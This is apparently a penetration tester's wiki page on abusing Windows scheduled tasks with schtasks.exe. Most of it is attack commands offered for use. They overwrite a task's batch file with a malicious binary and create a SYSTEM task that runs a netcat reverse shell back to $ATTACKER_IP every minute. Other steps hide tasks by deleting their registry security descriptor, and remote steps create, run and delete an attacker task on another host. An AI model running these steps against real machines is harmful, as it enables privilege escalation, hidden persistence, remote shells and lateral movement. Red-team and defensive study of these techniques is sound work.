1 min read

Use the built-in schtasks.exe command to create and manipulate Windows tasks (basically the equivalent of *NIX cron jobs).

Local tasks

Exploit local Windows tasks

# List scheduled tasks
#
schtasks
 
# View details about a scheduled task
#
schtasks /query /tn $TASK_NAME /fo list /v
 
# Check the permissions of an executable
#
icacls $PATH_TO_BINARY
 
# Modify the permissions (if possible/desired)
#
icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION
 
# You can overwrite files in Windows in the same way you'd do
# in Linux (however, this can cause issues with line
# endings... probably best to just use notepad.exe here
# instead)
#
echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE
 
# Force a task to run (iff the current user has permission to
# do so)
#
schtasks /run /tn $TASK_NAME

If a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task.

It may also be possible to create your own tasks.

# Creates a task that executes a netcat reverse shell back to
# the attacker. "/sc" and "/mo" indicate that the task should
# be run every minute. "/ru" indicates that the task will run
# with SYSTEM privileges.
#
schtasks /create /sc minute /mo 1 /tn $TASK_NAME `
	/tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" `
	/ru SYSTEM
 
# Checks to see if the task was created successfully.
#
schtasks /query /tn $TASK_NAME

Stealthy tasks

Deleting the task Security Descriptor will make the task invisible to any user in the system. Note that this requires PsExec!

  1. Use PsExec64.exe -s -i regedit to open regedit with SYSTEM privileges.

  2. Search in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.

Link to original

Remote tasks

Exploit remote Windows tasks

Warning

By default, UAC restricts remote schtasks.exe calls to domain admins and the default local “Administrator” account. Local Windows admins cannot call this service remotely without first disabling UAC!

The schtasks.exe command can also be used to create and manipulate services on remote machines. This uses the Windows RPC (TCP 135), but will fall back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, this is how schtasks.exe works locally as well; the only difference is that in this case a local named pipe is always used.)

# Create $ATTACKER_TASK on the $TARGET_HOST. Note that /sd
# (start date) and /st (start time) don't matter if we're
# invoking the task manually, as we do next.
#
schtasks /s $TARGET_HOST /RU "SYSTEM" /create `
         /tn "$ATTACKER_TASK" /tr "$SOME_COMMAND" /sc ONCE `
         /sd 06/25/2023 /st 16:10
 
# Invoke $ATTACKER_TASK.
#
schtasks /s $TARGET_HOST /run /TN "$ATTACKER_TASK"
 
# Clean up after yourself.
#
schtasks /S $TARGET_HOST /TN "$ATTACKER_TASK" /DELETE /F
Link to original

Backlinks

Graph View